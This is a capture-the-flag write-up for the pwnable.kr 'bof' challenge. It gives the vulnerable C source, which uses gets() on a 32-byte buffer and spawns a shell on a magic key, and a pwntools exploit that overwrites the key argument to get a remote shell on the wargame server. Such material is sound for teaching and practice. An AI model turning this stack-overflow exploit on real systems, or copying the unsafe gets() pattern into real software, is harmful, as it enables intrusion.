bof
{"author": ["ret2basic"]}

Source Code

1
#include <stdio.h>
2
#include <string.h>
3
#include <stdlib.h>
4
void func(int key){
5
char overflowme[32];
6
printf("overflow me : ");
7
gets(overflowme); // smash me!
8
if(key == 0xcafebabe){
9
system("/bin/sh");
10
}
11
else{
12
printf("Nah..\n");
13
}
14
}
15
int main(int argc, char* argv[]){
16
func(0xdeadbeef);
17
return 0;
18
}
Copied!

Solution

The objective is to overwrite the argument of func, which is at ebp + 0x8. The stack looks like this:
1
buffer (overflowme[32])
2
EIP
3
arg (key)
Copied!

Exploit

1
#!/usr/bin/env python3
2
from pwn import *
3
4
#--------Setup--------#
5
6
context(arch="i386", os="linux")
7
elf = ELF("bof", checksec=False)
8
9
host = "pwnable.kr"
10
port = 9000
11
12
#--------Overwrite--------#
13
14
offset = 48
15
16
payload = flat(
17
b"A" * offset,
18
b"B" * 4, # EIP
19
0xcafebabe, # arg overwrite
20
)
21
22
r = remote(host, port)
23
24
r.sendline(payload)
25
26
r.interactive()
Copied!
Last modified 5mo ago